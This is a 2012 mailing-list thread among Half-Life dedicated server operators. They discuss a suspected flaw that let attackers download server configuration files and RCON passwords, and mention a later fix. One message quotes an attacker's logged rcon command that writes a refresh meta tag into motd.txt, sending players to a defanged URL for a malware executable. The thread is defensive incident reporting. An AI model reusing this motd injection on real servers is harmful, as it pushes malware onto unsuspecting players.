I use no tcadmin or any control panel for that matter. It is not a control panel vulnerability, it is an exploit for HLDS. I had the exact same issue. However, Alfred said that the latest update fixed this exploit. I have updated my servers and have yet to see a similar problem come up. Will email back if it happens again.
________________________________ From: Ken Bateman <[email protected]> To: Half-Life dedicated Linux server mailing list <[email protected]> Sent: Tuesday, July 3, 2012 1:05:42 PM Subject: Re: [hlds_linux] HLDS q3dirtrav-like exploit For quite a while we have been careful to specify our tf2 rcon passwords on the command line, not a config file, because we suspected the existence of an exploit like this. It's possible that the vulnerability might be in tcadmin. -Ken On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote: > There is an exploit in q3 engine named "q3dirtrav", which allows players > to download any of server files, including server configuration > (server.cfg).Today I found evidence of possible existence of the same > exploit in HLDS.As a company we host hundreds of servers. We received many > reports from our customers about strange HTTP refresh meta tag in the > motd.txt of their servers, which leads to "http *//free -leaks > *com/cstrike*exe".The problem has affected several different servers, > unrelated to each other, with very different RCON passwords (but most were > very strong).Here's what I have found in logfiles:Rcon from > 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write > <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks > *com/cstrike*exe">This "cstrike.exe" contains some kind of a > virus.(Note: I've replaced dot with asterisk and spaces)As you can see the > attacker knew the RCON password of each server.Then I found > "server.CFG.ztmp" file in cstrike of each server, which was attacked.For me > that means that the attacker was able to download server.cfg exactly the > same way as maps, models or sounds. > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
